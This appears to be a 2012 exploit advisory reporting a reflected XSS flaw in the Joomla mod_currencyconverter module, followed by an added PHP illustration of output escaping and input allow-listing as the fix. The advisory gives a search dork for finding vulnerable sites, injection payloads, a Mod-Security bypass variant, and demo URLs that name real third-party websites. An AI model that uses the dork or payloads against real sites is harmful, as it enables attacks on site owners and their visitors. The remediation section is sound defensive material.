###############################################################################
# More exploits: http://adf.ly/5EHaQ ! #
###############################################################################
# Exploit Title: Joomla modules (mod_currencyconverter) XSS Vulnerability
# Date: 2012-02-02 [GMT +7]
# Author: BHG Security Center
# Software Link: http://joomla.org
# Dork: inurl:/includes/convert.php?from=
# Tested on: ubuntu 11.04
# CVE : -
-----------------------------------------------------------------------------------------
Joomla modules (mod_currencyconverter) XSS Vulnerability
-----------------------------------------------------------------------------------------
Author : BHG Security Center
Date : 2012-02-02
Location : Iran
Web : http://Black-Hg.Org
Critical Lvl : Medium
Where : From Remote
My Group : Black Hat Group #BHG
---------------------------------------------------------------------------
PoC/Exploit:
~~~~~~~~~~
------------- ( Cross Site Scripting ) ~
~ [PoC] ~: Http://[victim]/path/modules/mod_currencyconverter/includes/convert.php?from=[XSS]
------------- ( Demo Vulnerability ) ~
Demo : http://www.sarafitehran.com/modules/mod_currencyconverter/includes/convert.php?from="><script>alert(0)</script>
Demo : http://www.bhinnekatv.com/2K9/modules/mod_currencyconverter/includes/convert.php?from='>><marquee><h1>Pentest</h1></marquee>
Demo : http://www.turismoeducativo.com/site/modules/mod_currencyconverter/includes/convert.php?from='>><marquee><h1>Pentest</h1></marquee>
Demo : http://www.businessdayonline.com/modules/mod_currencyconverter/includes/convert.php?from="><script>alert(0)</script>
Note: The URL-encoded GET input convert.php?from= was set to '>><marquee><h1>Pentest</h1></marquee> [For Bypass Mod-Security]
Timeline:
~~~~~~~~~
- 29 - 01 - 2012 bug found.
- 01 - 02 - 2012 vendor contacted, but no response.
- 02 - 02 - 2012 advisory released.
---------------------------------------------------------------------------
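The advisory never shows the source of convert.php, only the PoC URL, so the following is an added illustration of the bug class it reports (a GET parameter reflected into HTML without escaping) alongside the fix a maintainer would apply. It is not the module's code and not the advisory author's code; the function names render_unsafe, render_safe and is_currency_code, and the input-field markup, are assumptions made for the example.

```php
<?php
// Added illustration, not mod_currencyconverter's source. The advisory does not
// show convert.php, so the "before" below is a hypothetical reconstruction of
// the reported bug class: a GET parameter echoed into HTML verbatim.

// Hypothetical vulnerable pattern: ?from= lands in the attribute unchanged, so a
// value containing a quote and '>' closes the tag and injects its own markup.
function render_unsafe(string $from): string
{
    return '<input type="text" name="from" value="' . $from . '">';
}

// Hardened form: every untrusted value placed into HTML is escaped for that
// context. ENT_QUOTES covers both quote styles, so the value cannot break out
// of a double- or single-quoted attribute; ENT_SUBSTITUTE replaces invalid
// byte sequences instead of returning an empty string; the charset is explicit.
function render_safe(string $from): string
{
    $escaped = htmlspecialchars($from, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<input type="text" name="from" value="' . $escaped . '">';
}

// Allow-list on top of escaping: an ISO 4217 currency code is three ASCII
// letters, so anything else can be rejected before it is rendered at all.
function is_currency_code(string $from): bool
{
    return (bool) preg_match('/^[A-Z]{3}$/', $from);
}

// Constructed sample input, shaped like the advisory's PoC payload.
$sample = '"><script>alert(0)</script>';

echo "unsafe:       ", render_unsafe($sample), "\n";
echo "safe:         ", render_safe($sample), "\n";
echo "allow-listed: ", is_currency_code($sample) ? 'accepted' : 'rejected', "\n";
echo "allow-listed: ", is_currency_code('USD') ? 'accepted' : 'rejected', "\n";
```

The escaped output keeps the injected text inside the attribute as inert `&quot;&gt;&lt;script&gt;...`, while the allow-list rejects it outright and accepts a plain `USD`. Two further checks follow from the PoC: the request reaches `includes/convert.php` directly rather than through Joomla's `index.php`, and Joomla's convention for files that are only meant to run inside the framework is a `defined('_JEXEC') or die;` guard at the top, which is worth confirming on any module include that does not need to serve as a standalone endpoint; and because the advisory's second payload variant uses `'>>` rather than `"><`, a WAF rule keyed on one quote style is not a substitute for output escaping in the application.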